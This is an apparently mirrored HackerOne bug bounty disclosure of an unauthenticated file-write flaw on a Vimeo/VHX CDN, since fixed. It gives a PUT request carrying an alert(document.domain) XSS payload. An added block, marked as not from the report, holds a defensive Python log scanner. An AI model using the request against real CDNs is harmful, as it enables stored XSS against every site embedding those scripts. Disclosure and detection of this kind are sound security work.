VHX: Possibility to overwrite any file in the vpe.cdn.vimeo.tv leads to the Stored XSS for the all customers on the embed.vhx.tv
2018-11-29T14:55:03
ID H1:452559 Type hackerone Reporter sp1d3rs Modified 2019-07-10T19:12:30
Description
By modifying the Content-Type to be blank, during a PUT command, the researcher was able to upload files to the CDN. This has been resolved.
It was possible to write (and overwrite) arbitrary files on the CDN (`vpe.cdn.vimeo.tv`) used to deliver JS scripts to the various in-scope assets, by sending a PUT request with a blank or `application/octet-stream` Content-Type. Any other Content-Type caused an auth error from the Google Cloud Storage side.
Example:
```
PUT /something.js HTTP/1.1
Host: vpe.cdn.vimeo.tv
Content-Type: application/octet-stream
Content-Length: 10
Connection: close

alert(document.domain)
```
could create `something.js` with an XSS payload, or overwrite `something.js` if it already exists.
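A defender-side check for this class of bug, added here as an example that is not part of the report or of VHX's own tooling: it scans request logs for successful write requests to the asset CDN that did not come from the deployment identity, marks the blank/`application/octet-stream` Content-Type pattern described above, and rates overwrites of already-served assets higher than new files. The log format, the deploy identity and the asset list are constructed assumptions.

```python
import json

WRITE_METHODS = {"PUT", "POST", "PATCH", "DELETE"}
# Hypothetical: the only identity that should ever write to the asset bucket.
ALLOWED_WRITERS = {"deploy-bot@example-project.iam.gserviceaccount.com"}
# Hypothetical: assets already served from the CDN; overwriting one hits every embed.
EXISTING_ASSETS = {"/player.js"}

# Constructed sample log lines (one JSON object per line); not the real GCS log schema.
SAMPLE_LOG = """\
{"ts":"2018-11-28T10:00:01Z","method":"GET","path":"/player.js","status":200,"principal":null,"content_type":null}
{"ts":"2018-11-28T10:00:02Z","method":"PUT","path":"/player.js","status":200,"principal":"deploy-bot@example-project.iam.gserviceaccount.com","content_type":"application/javascript"}
{"ts":"2018-11-28T10:05:17Z","method":"PUT","path":"/something.js","status":200,"principal":null,"content_type":"application/octet-stream"}
{"ts":"2018-11-28T10:05:18Z","method":"PUT","path":"/something.js","status":403,"principal":null,"content_type":"text/html"}
{"ts":"2018-11-28T10:05:19Z","method":"PUT","path":"/player.js","status":200,"principal":null,"content_type":""}
"""


def find_unauthorized_writes(log_text, allowed_writers=ALLOWED_WRITERS,
                             existing_assets=EXISTING_ASSETS):
    """Return one finding per successful write not made by an allowed writer."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        # Reads and rejected writes are out of scope for this rule (a burst of
        # rejected PUTs is still worth a separate rate alert).
        if rec["method"] not in WRITE_METHODS or not 200 <= rec["status"] < 300:
            continue
        if rec.get("principal") in allowed_writers:
            continue
        content_type = rec.get("content_type") or ""
        findings.append({
            "ts": rec["ts"],
            "path": rec["path"],
            # Blank or octet-stream Content-Type on an unauthenticated write is
            # exactly the pattern that slipped past the CDN in this report.
            "bypass_pattern": content_type in ("", "application/octet-stream"),
            # Overwriting a live script is stored XSS on every page that embeds it,
            # so it outranks the creation of a new file.
            "severity": "critical" if rec["path"] in existing_assets else "high",
        })
    return findings
```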
The issue was fixed fast. Thanks to the VHX team for the great experience, awesome communication and the bounty!
Link https://hackerone.com/reports/452559 Bounty $1500 State resolved